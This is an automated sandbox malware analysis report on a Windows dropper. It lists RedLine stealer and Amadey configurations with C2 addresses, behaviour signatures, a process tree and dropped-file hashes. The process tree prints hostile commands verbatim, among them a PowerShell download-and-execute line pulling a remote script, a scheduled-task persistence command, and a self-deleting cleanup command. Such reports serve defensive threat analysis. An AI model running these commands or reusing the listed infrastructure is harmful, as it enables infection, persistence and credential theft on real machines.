Analysis

  • max time kernel
    144s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 06:48

General

  • Target

    0e96d04acea2dca095b4833177b28b5f054d3798aeb3fa5a192a88cd2826bca3.exe

  • Size

    1018KB

  • MD5

    9e1a8719a083bed2237e8b2360327400

  • SHA1

    e200a75ca0da5205c3b1c15f9bd62b9b447a7c70

  • SHA256

    0e96d04acea2dca095b4833177b28b5f054d3798aeb3fa5a192a88cd2826bca3

  • SHA512

    e312119989c71eed737cf4d89655dcf3cc07d8290e3a20a19a02598de45a42680db59989e97bb8d41f16faaadbea8d62ffbe8e1f9583b55376275bd8b37ffdb2

  • SSDEEP

    12288:TMrmy90XYbXtMBxYfpGRyBRiGXqMkLND8QTuAMf5rUvhRgyxlE/6YdqjCCbNyUxc:NymYztMPAGAGGKBjNWUXx+/mxx/E

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.mdegmm.com/pdf/debug2.ps1

Extracted

Family

redline

Botnet

gena

C2

193.233.20.30:4125

Attributes
  • auth_value

    93c20961cb6b06b2d5781c212db6201e

Extracted

Family

redline

Botnet

vint

C2

193.233.20.30:4125

Attributes
  • auth_value

    fb8811912f8370b3d23bffda092d88d0

Extracted

Family

amadey

Version

3.68

C2

62.204.41.87/joomla/index.php

Extracted

Family

redline

Botnet

14

C2

45.12.253.144:40145

Attributes
  • auth_value

    6528d0f243ad9e530a68f2a487521a80

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 18 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e96d04acea2dca095b4833177b28b5f054d3798aeb3fa5a192a88cd2826bca3.exe
    "C:\Users\Admin\AppData\Local\Temp\0e96d04acea2dca095b4833177b28b5f054d3798aeb3fa5a192a88cd2826bca3.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap2469.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap2469.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap4221.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap4221.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:3644
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9231.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9231.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:3824
          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz8797.exe
            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz8797.exe
            5⤵
            • Modifies Windows Defender Real-time Protection settings
            • Executes dropped EXE
            • Windows security modification
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2080
          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v7101Vt.exe
            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v7101Vt.exe
            5⤵
            • Modifies Windows Defender Real-time Protection settings
            • Executes dropped EXE
            • Windows security modification
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:452
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 452 -s 1076
              6⤵
              • Program crash
              PID:1856
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w68Ul51.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w68Ul51.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5052
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 1812
            5⤵
            • Program crash
            PID:2604
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xSUtP88.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xSUtP88.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1684
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y83FF72.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y83FF72.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1692
      • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
        "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
          4⤵
          • Creates scheduled task(s)
          PID:3892
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4848
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            5⤵
              PID:4524
            • C:\Windows\SysWOW64\cacls.exe
              CACLS "legenda.exe" /P "Admin:N"
              5⤵
                PID:2264
              • C:\Windows\SysWOW64\cacls.exe
                CACLS "legenda.exe" /P "Admin:R" /E
                5⤵
                  PID:3360
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  5⤵
                    PID:3716
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "..\f22b669919" /P "Admin:N"
                    5⤵
                      PID:3052
                    • C:\Windows\SysWOW64\cacls.exe
                      CACLS "..\f22b669919" /P "Admin:R" /E
                      5⤵
                        PID:2080
                    • C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2668
                    • C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe"
                      4⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:4012
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1288
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
                          6⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:672
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe" >> NUL
                        5⤵
                          PID:4504
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1
                            6⤵
                            • Runs ping.exe
                            PID:2448
                      • C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe"
                        4⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1504
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
                          5⤵
                            PID:4332
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
                              6⤵
                              • Blocklisted process makes network request
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3156
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe" >> NUL
                            5⤵
                              PID:468
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.1
                                6⤵
                                • Runs ping.exe
                                PID:516
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                            4⤵
                            • Loads dropped DLL
                            PID:1616
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 452 -ip 452
                      1⤵
                        PID:5092
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5052 -ip 5052
                        1⤵
                          PID:3984
                        • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                          C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                          1⤵
                          • Executes dropped EXE
                          PID:1160

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Execution

                        Scheduled Task

                        1
                        T1053

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Registry Run Keys / Startup Folder

                        1
                        T1060

                        Scheduled Task

                        1
                        T1053

                        Privilege Escalation

                        Scheduled Task

                        1
                        T1053

                        Defense Evasion

                        Modify Registry

                        3
                        T1112

                        Disabling Security Tools

                        2
                        T1089

                        Credential Access

                        Credentials in Files

                        2
                        T1081

                        Discovery

                        Query Registry

                        2
                        T1012

                        System Information Discovery

                        2
                        T1082

                        Remote System Discovery

                        1
                        T1018

                        Collection

                        Data from Local System

                        2
                        T1005

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
                          Filesize

                          2KB

                          MD5

                          fc88b7748eb4cd37ae886a1c0813e4cf

                          SHA1

                          23e30b76fc94f0467a3efad342a91a3b84ff1eea

                          SHA256

                          3d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da

                          SHA512

                          bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
                          Filesize

                          1KB

                          MD5

                          cb684ec7fe8555f949182c7423dafdc2

                          SHA1

                          ec49f7b4b777fa1da40af5328785782127ffc52c

                          SHA256

                          8e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e

                          SHA512

                          ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
                          Filesize

                          482B

                          MD5

                          22ce5cee4b98a46dcc781d8e6f5e25f4

                          SHA1

                          bca46f07dad1a75a794bc51c0ba43214ba0fe2d7

                          SHA256

                          60cf925267765edfb1aa3d8e7c30168346322bf5633028df4299766ca7e8eccb

                          SHA512

                          dff40e50bec54fb0a208554761aaeb82dafc3728f5f31291387fa117848a8ae807bca7ad7252cbb390aed4aa442003afc16f5a119197e5637a3e9f4e4bb21366

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
                          Filesize

                          486B

                          MD5

                          ef29cee682330ae1618676abfbc3ecfc

                          SHA1

                          184781e910d193e98179de8eb7fb01dcbd9f658e

                          SHA256

                          dd61fc7fbf751e950e372c3601d9c944ff42755668c4d4528071ec03264d750b

                          SHA512

                          0c728e118453069c1d8260ee642aae324346d1fa34d546a4cab1d166c64c3ace6c8631bc65102256d9996ad566124260f129d752ffb4e16b31932449f379ff84

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                          Filesize

                          3KB

                          MD5

                          556084f2c6d459c116a69d6fedcc4105

                          SHA1

                          633e89b9a1e77942d822d14de6708430a3944dbc

                          SHA256

                          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                          SHA512

                          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          def7884bfec63bbb926d51438b7439c2

                          SHA1

                          48f7438447cc4b0e6e44735dc17a2659380218fd

                          SHA256

                          d4951ddfe54394c89d24be1f17576dceefdcc97b905f33fae7bf1caeba2d92f9

                          SHA512

                          22c529d29befd1b070cb5cdb9c1194ba162035756f7b9d25d4c73537dd286c483fd4a4770b920d58a9536cfc64a5e9bff88f5f46bf1d2cc5bf5ab25005aacfb1

                        • C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
                          Filesize

                          336KB

                          MD5

                          f8e0e6946af017037e8bb4d5455d4e99

                          SHA1

                          6691a0d551c3991fbe5f18147711e829616099bb

                          SHA256

                          4f8e88f1d2bf0817faa0627fa1c9b92715b13015bf7f38d7fcc6d27a4e511d6e

                          SHA512

                          f2fa94c86c400ae894abc3d9fa7316ad47cf1bf4b039dd162cab13c1e4c29c68646919c2076804b885863dd15e79053ef378bdf996b030c6764c144eb36c6e93

                        • C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
                          Filesize

                          336KB

                          MD5

                          f8e0e6946af017037e8bb4d5455d4e99

                          SHA1

                          6691a0d551c3991fbe5f18147711e829616099bb

                          SHA256

                          4f8e88f1d2bf0817faa0627fa1c9b92715b13015bf7f38d7fcc6d27a4e511d6e

                          SHA512

                          f2fa94c86c400ae894abc3d9fa7316ad47cf1bf4b039dd162cab13c1e4c29c68646919c2076804b885863dd15e79053ef378bdf996b030c6764c144eb36c6e93

                        • C:\Users\Admin\AppData\Local\Temp\1000097001\world.exe
                          Filesize

                          336KB

                          MD5

                          f8e0e6946af017037e8bb4d5455d4e99

                          SHA1

                          6691a0d551c3991fbe5f18147711e829616099bb

                          SHA256

                          4f8e88f1d2bf0817faa0627fa1c9b92715b13015bf7f38d7fcc6d27a4e511d6e

                          SHA512

                          f2fa94c86c400ae894abc3d9fa7316ad47cf1bf4b039dd162cab13c1e4c29c68646919c2076804b885863dd15e79053ef378bdf996b030c6764c144eb36c6e93

                        • C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe
                          Filesize

                          144KB

                          MD5

                          b5baf2e6261a1fb05bb2654c8d099dd6

                          SHA1

                          2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                          SHA256

                          4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                          SHA512

                          4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                        • C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe
                          Filesize

                          144KB

                          MD5

                          b5baf2e6261a1fb05bb2654c8d099dd6

                          SHA1

                          2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                          SHA256

                          4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                          SHA512

                          4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                        • C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe
                          Filesize

                          144KB

                          MD5

                          b5baf2e6261a1fb05bb2654c8d099dd6

                          SHA1

                          2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                          SHA256

                          4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                          SHA512

                          4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                        • C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe
                          Filesize

                          144KB

                          MD5

                          b5baf2e6261a1fb05bb2654c8d099dd6

                          SHA1

                          2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                          SHA256

                          4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                          SHA512

                          4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                        • C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe
                          Filesize

                          144KB

                          MD5

                          b5baf2e6261a1fb05bb2654c8d099dd6

                          SHA1

                          2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550

                          SHA256

                          4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d

                          SHA512

                          4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y83FF72.exe
                          Filesize

                          235KB

                          MD5

                          5086db99de54fca268169a1c6cf26122

                          SHA1

                          003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                          SHA256

                          42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                          SHA512

                          90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y83FF72.exe
                          Filesize

                          235KB

                          MD5

                          5086db99de54fca268169a1c6cf26122

                          SHA1

                          003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                          SHA256

                          42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                          SHA512

                          90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap2469.exe
                          Filesize

                          835KB

                          MD5

                          062bf88e5c3d16ae1a33f0edecb1e3dc

                          SHA1

                          abf4e113c5beb5affdaba1d89308af7a55142394

                          SHA256

                          89635354e3c8e74b42154c1d877e9ab6bb692280dc5ab6f2657e0b40e5a6176d

                          SHA512

                          85177b1a1915b660690e00e78eebe476c013b2435b7518bd57bba3a193541666a78962c51a015746812f6940c4584c7db21901b98078661a733b89206f42527b

                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap2469.exe
                          Filesize

                          835KB

                          MD5

                          062bf88e5c3d16ae1a33f0edecb1e3dc

                          SHA1

                          abf4e113c5beb5affdaba1d89308af7a55142394

                          SHA256

                          89635354e3c8e74b42154c1d877e9ab6bb692280dc5ab6f2657e0b40e5a6176d

                          SHA512

                          85177b1a1915b660690e00e78eebe476c013b2435b7518bd57bba3a193541666a78962c51a015746812f6940c4584c7db21901b98078661a733b89206f42527b

                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xSUtP88.exe
                          Filesize

                          175KB

                          MD5

                          3389637c0d072121bf1b127629736d37

                          SHA1

                          300e915efdf2479bfd0d3699c0a6bc51260f9655

                          SHA256

                          2b74c4ce2674a8fc0c78fffa39c5de5e43ae28b8bf425349a5f97c6a61135153

                          SHA512

                          a32cc060d2600f6ca94ffdce07c95ea5e2f56c0b418260456b568cb41e5f55db0c4fc97c35ca4103c674e61a17300d834d2c0da5a78b7084b6bc342fd23a7fb4

                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xSUtP88.exe
                          Filesize

                          175KB

                          MD5

                          3389637c0d072121bf1b127629736d37

                          SHA1

                          300e915efdf2479bfd0d3699c0a6bc51260f9655

                          SHA256

                          2b74c4ce2674a8fc0c78fffa39c5de5e43ae28b8bf425349a5f97c6a61135153

                          SHA512

                          a32cc060d2600f6ca94ffdce07c95ea5e2f56c0b418260456b568cb41e5f55db0c4fc97c35ca4103c674e61a17300d834d2c0da5a78b7084b6bc342fd23a7fb4

                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap4221.exe
                          Filesize

                          693KB

                          MD5

                          e75e7efc933bdfe6b1cec008f7c5efbe

                          SHA1

                          8ce40fcb524cbf6cc7041cc9a8916fb8f3d688c2

                          SHA256

                          fdb08619feeff234f3d1ea97ce557b6001bbbcfa76d8a54ff64ae29f55a9685c

                          SHA512

                          810afe7b85453514691a5919ecc9679e9d5131608dc106890cfb80dac7e9848402e1803522e63940e4e0b1aec3d3199739125f7140e2e8b714de760d7dc61fca

                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap4221.exe
                          Filesize

                          693KB

                          MD5

                          e75e7efc933bdfe6b1cec008f7c5efbe

                          SHA1

                          8ce40fcb524cbf6cc7041cc9a8916fb8f3d688c2

                          SHA256

                          fdb08619feeff234f3d1ea97ce557b6001bbbcfa76d8a54ff64ae29f55a9685c

                          SHA512

                          810afe7b85453514691a5919ecc9679e9d5131608dc106890cfb80dac7e9848402e1803522e63940e4e0b1aec3d3199739125f7140e2e8b714de760d7dc61fca

                        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w68Ul51.exe
                          Filesize

                          362KB

                          MD5

                          29b97305ea56e1cd1b8e73227ced2065

                          SHA1

                          6d3949469e042439b79f4d03f711a3c975f31326

                          SHA256

                          c39e9a4cc09a7f4c0bea843b2b795ae0eee81ca457961b5939df66c744b9d39e

                          SHA512

                          11b1ca25374d0c6eb04b66dc4fc3e910704beef2a3e0b1caa2981095cb103a996d40c7237788eb486c9fc04976e104e8400666065142684e6137bc4cc483c767

                        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w68Ul51.exe
                          Filesize

                          362KB

                          MD5

                          29b97305ea56e1cd1b8e73227ced2065

                          SHA1

                          6d3949469e042439b79f4d03f711a3c975f31326

                          SHA256

                          c39e9a4cc09a7f4c0bea843b2b795ae0eee81ca457961b5939df66c744b9d39e

                          SHA512

                          11b1ca25374d0c6eb04b66dc4fc3e910704beef2a3e0b1caa2981095cb103a996d40c7237788eb486c9fc04976e104e8400666065142684e6137bc4cc483c767

                        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9231.exe
                          Filesize

                          344KB

                          MD5

                          8207c1bf72a35abf5072d7ed34d64111

                          SHA1

                          89932ae769b104fc210cc72aa6819dc1eb04f224

                          SHA256

                          a9e35234080394f4c10e31d6c157379225fd0c9105adc317f81178de92e90ebf

                          SHA512

                          9a17feb8af435d97d88b607eb82be2ef1e82af94d035d48a164e8a361040c43fa85330d98647492ef928ae57da0bb94f3ade1d186e9cb34512476dd46f8d95d0

                        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap9231.exe
                          Filesize

                          344KB

                          MD5

                          8207c1bf72a35abf5072d7ed34d64111

                          SHA1

                          89932ae769b104fc210cc72aa6819dc1eb04f224

                          SHA256

                          a9e35234080394f4c10e31d6c157379225fd0c9105adc317f81178de92e90ebf

                          SHA512

                          9a17feb8af435d97d88b607eb82be2ef1e82af94d035d48a164e8a361040c43fa85330d98647492ef928ae57da0bb94f3ade1d186e9cb34512476dd46f8d95d0

                        • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz8797.exe
                          Filesize

                          11KB

                          MD5

                          7e93bacbbc33e6652e147e7fe07572a0

                          SHA1

                          421a7167da01c8da4dc4d5234ca3dd84e319e762

                          SHA256

                          850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                          SHA512

                          250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

                        • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz8797.exe
                          Filesize

                          11KB

                          MD5

                          7e93bacbbc33e6652e147e7fe07572a0

                          SHA1

                          421a7167da01c8da4dc4d5234ca3dd84e319e762

                          SHA256

                          850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                          SHA512

                          250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

                        • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v7101Vt.exe
                          Filesize

                          304KB

                          MD5

                          025aaacfaf2ea25ae13e10052b5e2a87

                          SHA1

                          851dda5a33e73aef89d7254d62f5bb408c71caa9

                          SHA256

                          a6b69fd0e07360a55d3a2ca82e00e9ec52dcdd3c31fe2507340e5af72d65154b

                          SHA512

                          d548316c2e6ccf4ce8317bb519b95d8363b72d913f5a532e616f6aad7e571260828e5028567a9bf950a13d75ce8828b41fc225c77d6a10f5ce8c0514b97644b8

                        • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v7101Vt.exe
                          Filesize

                          304KB

                          MD5

                          025aaacfaf2ea25ae13e10052b5e2a87

                          SHA1

                          851dda5a33e73aef89d7254d62f5bb408c71caa9

                          SHA256

                          a6b69fd0e07360a55d3a2ca82e00e9ec52dcdd3c31fe2507340e5af72d65154b

                          SHA512

                          d548316c2e6ccf4ce8317bb519b95d8363b72d913f5a532e616f6aad7e571260828e5028567a9bf950a13d75ce8828b41fc225c77d6a10f5ce8c0514b97644b8

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmn21ldy.2uj.ps1
                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                          Filesize

                          235KB

                          MD5

                          5086db99de54fca268169a1c6cf26122

                          SHA1

                          003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                          SHA256

                          42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                          SHA512

                          90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                        • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                          Filesize

                          235KB

                          MD5

                          5086db99de54fca268169a1c6cf26122

                          SHA1

                          003f768ffcc99bda5cda1fb966fda8625a8fdc3e

                          SHA256

                          42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4

                          SHA512

                          90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5

                        • C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
                          Filesize

                          235KB

                          MD5

